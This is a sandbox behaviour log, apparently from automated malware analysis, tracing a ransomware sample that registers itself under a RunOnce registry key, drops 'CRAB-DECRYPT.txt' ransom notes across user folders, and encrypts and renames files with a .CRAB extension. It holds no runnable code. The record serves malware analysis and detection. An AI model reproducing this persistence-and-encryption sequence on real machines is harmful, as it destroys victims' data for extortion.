| Driver | Get Name | load_address = 1812267008 |
|
1 | |
| Driver | Get Name | load_address = 1812398080 |
|
1 | |
| Driver | Get Name | load_address = 1812594688 |
|
1 | |
| Driver | Get Name | load_address = 1812725760 |
|
1 | |
| Driver | Get Name | load_address = 1812791296 |
|
1 | |
| Driver | Get Name | load_address = 1812922368 |
|
1 | |
| Driver | Get Name | load_address = 1812987904 |
|
1 | |
| Driver | Get Name | load_address = 1813184512 |
|
1 | |
| Driver | Get Name | load_address = 1813446656 |
|
1 | |
| Driver | Get Name | load_address = 1813774336 |
|
1 | |
| Driver | Get Name | load_address = 1749221376 |
|
1 | |
| Driver | Get Name | load_address = 1738539008 |
|
1 | |
| Driver | Get Name | load_address = 1742274560 |
|
1 | |
| Driver | Get Name | load_address = 1813905408 |
|
1 | |
| Driver | Get Name | load_address = 1802764288 |
|
1 | |
| Driver | Get Name | load_address = 1743781888 |
|
1 | |
| Driver | Get Name | load_address = 1743847424 |
|
1 | |
| Driver | Get Name | load_address = 1813970944 |
|
1 | |
| Driver | Get Name | load_address = 1807351808 |
|
1 | |
| Driver | Get Name | load_address = 1810432000 |
|
1 | |
| Driver | Get Name | load_address = 1810563072 |
|
1 | |
| Driver | Get Name | load_address = 1810694144 |
|
1 | |
| Driver | Get Name | load_address = 1824194560 |
|
1 | |
| Driver | Get Name | load_address = 1825374208 |
|
1 | |
| Driver | Get Name | load_address = 1825570816 |
|
1 | |
| Driver | Get Name | load_address = 1826095104 |
|
1 | |
| Driver | Get Name | load_address = 1826357248 |
|
1 | |
| Driver | Get Name | load_address = 1826488320 |
|
1 | |
| Driver | Get Name | load_address = 1818230784 |
|
1 | |
| Driver | Get Name | load_address = 1818558464 |
|
1 | |
| Driver | Get Name | load_address = 1819344896 |
|
1 | |
| Driver | Get Name | load_address = 1819672576 |
|
1 | |
| Driver | Get Name | load_address = 1820393472 |
|
1 | |
| Driver | Get Name | load_address = 1820983296 |
|
1 | |
| Driver | Get Name | load_address = 1821179904 |
|
1 | |
| Driver | Get Name | load_address = 1821507584 |
|
1 | |
| Driver | Get Name | load_address = 1821638656 |
|
1 | |
| Driver | Get Name | load_address = 1822162944 |
|
1 | |
| Driver | Enumerate | load_addresses = 1703688 |
|
1 | |
| Driver | Enumerate | load_addresses = 4521984 |
|
1 | |
| Driver | Get Name | load_address = 3104292864 |
|
1 | |
| Driver | Get Name | load_address = 3103821824 |
|
1 | |
| Driver | Get Name | load_address = 3089149952 |
|
1 | |
| Driver | Get Name | load_address = 1785528320 |
|
1 | |
| Driver | Get Name | load_address = 1786118144 |
|
1 | |
| Driver | Get Name | load_address = 1786183680 |
|
1 | |
| Driver | Get Name | load_address = 1778384896 |
|
1 | |
| Driver | Get Name | load_address = 1778581504 |
|
1 | |
| Driver | Get Name | load_address = 1778712576 |
|
1 | |
| Driver | Get Name | load_address = 1778778112 |
|
1 | |
| Driver | Get Name | load_address = 1778843648 |
|
1 | |
| Driver | Get Name | load_address = 1778909184 |
|
1 | |
| Driver | Get Name | load_address = 1779564544 |
|
1 | |
| Driver | Get Name | load_address = 1779957760 |
|
1 | |
| Driver | Get Name | load_address = 1780416512 |
|
1 | |
| Driver | Get Name | load_address = 1780613120 |
|
1 | |
| Driver | Get Name | load_address = 1781334016 |
|
1 | |
| Driver | Get Name | load_address = 1782185984 |
|
1 | |
| Driver | Get Name | load_address = 1782317056 |
|
1 | |
| Driver | Get Name | load_address = 1782513664 |
|
1 | |
| Driver | Get Name | load_address = 1782579200 |
|
1 | |
| Driver | Get Name | load_address = 1783234560 |
|
1 | |
| Driver | Get Name | load_address = 1783824384 |
|
1 | |
| Driver | Get Name | load_address = 1783889920 |
|
1 | |
| Driver | Get Name | load_address = 1784020992 |
|
1 | |
| Driver | Get Name | load_address = 1784086528 |
|
1 | |
| Driver | Get Name | load_address = 1784217600 |
|
1 | |
| Driver | Get Name | load_address = 1784283136 |
|
1 | |
| Driver | Get Name | load_address = 1784676352 |
|
1 | |
| Driver | Get Name | load_address = 1784807424 |
|
1 | |
| Driver | Get Name | load_address = 1784938496 |
|
1 | |
| Driver | Get Name | load_address = 1785069568 |
|
1 | |
| Driver | Get Name | load_address = 1797849088 |
|
1 | |
| Driver | Get Name | load_address = 1798438912 |
|
1 | |
| Driver | Get Name | load_address = 1798569984 |
|
1 | |
| Driver | Get Name | load_address = 1798963200 |
|
1 | |
| Driver | Get Name | load_address = 1799094272 |
|
1 | |
| Driver | Get Name | load_address = 1786773504 |
|
1 | |
| Driver | Get Name | load_address = 1787297792 |
|
1 | |
| Driver | Get Name | load_address = 1787428864 |
|
1 | |
| Driver | Get Name | load_address = 1787559936 |
|
1 | |
| Driver | Get Name | load_address = 1787822080 |
|
1 | |
| Driver | Get Name | load_address = 1790050304 |
|
1 | |
| Driver | Get Name | load_address = 1790115840 |
|
1 | |
| Driver | Get Name | load_address = 1791295488 |
|
1 | |
| Driver | Get Name | load_address = 1791819776 |
|
1 | |
| Driver | Get Name | load_address = 1792016384 |
|
1 | |
| Driver | Get Name | load_address = 1794506752 |
|
1 | |
| Driver | Get Name | load_address = 1794965504 |
|
1 | |
| Driver | Get Name | load_address = 1795162112 |
|
1 | |
| Driver | Get Name | load_address = 1795883008 |
|
1 | |
| Driver | Get Name | load_address = 1796341760 |
|
1 | |
| Driver | Get Name | load_address = 1796669440 |
|
1 | |
| Driver | Get Name | load_address = 1796931584 |
|
1 | |
| Driver | Get Name | load_address = 1797062656 |
|
1 | |
| Driver | Get Name | load_address = 1797586944 |
|
1 | |
| Driver | Get Name | load_address = 1802174464 |
|
1 | |
| Driver | Get Name | load_address = 1802305536 |
|
1 | |
| Driver | Get Name | load_address = 1802371072 |
|
1 | |
| Driver | Get Name | load_address = 1802436608 |
|
1 | |
| Driver | Get Name | load_address = 1802502144 |
|
1 | |
| Driver | Get Name | load_address = 1802633216 |
|
1 | |
| Driver | Get Name | load_address = 1814233088 |
|
1 | |
| Driver | Get Name | load_address = 1816264704 |
|
1 | |
| Driver | Get Name | load_address = 1816395776 |
|
1 | |
| Driver | Get Name | load_address = 1816526848 |
|
1 | |
| Driver | Get Name | load_address = 1816592384 |
|
1 | |
| Driver | Get Name | load_address = 1816788992 |
|
1 | |
| Driver | Get Name | load_address = 1816854528 |
|
1 | |
| Driver | Get Name | load_address = 1817182208 |
|
1 | |
| Driver | Get Name | load_address = 1817837568 |
|
1 | |
| Driver | Get Name | load_address = 1817968640 |
|
1 | |
| Driver | Get Name | load_address = 1805647872 |
|
1 | |
| Driver | Get Name | load_address = 1805778944 |
|
1 | |
| Driver | Get Name | load_address = 1806303232 |
|
1 | |
| Driver | Get Name | load_address = 1806893056 |
|
1 | |
| Driver | Get Name | load_address = 1806958592 |
|
1 | |
| Driver | Get Name | load_address = 1807024128 |
|
1 | |
| Driver | Get Name | load_address = 1807089664 |
|
1 | |
| Driver | Get Name | load_address = 1807155200 |
|
1 | |
| Driver | Get Name | load_address = 1807482880 |
|
1 | |
| Driver | Get Name | load_address = 1807745024 |
|
1 | |
| Driver | Get Name | load_address = 1807876096 |
|
1 | |
| Driver | Get Name | load_address = 1807941632 |
|
1 | |
| Driver | Get Name | load_address = 1808072704 |
|
1 | |
| Driver | Get Name | load_address = 1808203776 |
|
1 | |
| Driver | Get Name | load_address = 1808596992 |
|
1 | |
| Driver | Get Name | load_address = 1808793600 |
|
1 | |
| Driver | Get Name | load_address = 1809252352 |
|
1 | |
| Driver | Get Name | load_address = 1809383424 |
|
1 | |
| Driver | Get Name | load_address = 1810956288 |
|
1 | |
| Driver | Get Name | load_address = 1811021824 |
|
1 | |
| Driver | Get Name | load_address = 1811087360 |
|
1 | |
| Driver | Get Name | load_address = 1811152896 |
|
1 | |
| Driver | Get Name | load_address = 1811677184 |
|
1 | |
| Driver | Get Name | load_address = 1811742720 |
|
1 | |
| Driver | Get Name | load_address = 1812201472 |
|
1 | |
| Driver | Get Name | load_address = 1812267008 |
|
1 | |
| Driver | Get Name | load_address = 1812398080 |
|
1 | |
| Driver | Get Name | load_address = 1812594688 |
|
1 | |
| Driver | Get Name | load_address = 1812725760 |
|
1 | |
| Driver | Get Name | load_address = 1812791296 |
|
1 | |
| Driver | Get Name | load_address = 1812922368 |
|
1 | |
| Driver | Get Name | load_address = 1812987904 |
|
1 | |
| Driver | Get Name | load_address = 1813184512 |
|
1 | |
| Driver | Get Name | load_address = 1813446656 |
|
1 | |
| Driver | Get Name | load_address = 1813774336 |
|
1 | |
| Driver | Get Name | load_address = 1749221376 |
|
1 | |
| Driver | Get Name | load_address = 1738539008 |
|
1 | |
| Driver | Get Name | load_address = 1742274560 |
|
1 | |
| Driver | Get Name | load_address = 1813905408 |
|
1 | |
| Driver | Get Name | load_address = 1802764288 |
|
1 | |
| Driver | Get Name | load_address = 1743781888 |
|
1 | |
| Driver | Get Name | load_address = 1743847424 |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Environment | Get Environment String | name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = yczsdfarmlf, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ |
|
1 |
Thread 0x2c8
2589
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP, size = 1048576, size_out = 150 |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP, size = 160 |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP, size = 256 |
|
2 | |
| File | Write | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP, size = 16 |
|
1 | |
| File | Move | source_filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP, destination_filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\MSOCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT.LOG1, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT.LOG1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT.LOG2, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Create | filename = C:\Users\Default\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Default User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif, size = 1048576, size_out = 2530 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif, size = 2544 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc, size = 1048576, size_out = 76537 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc, size = 76544 |
|
1 | |
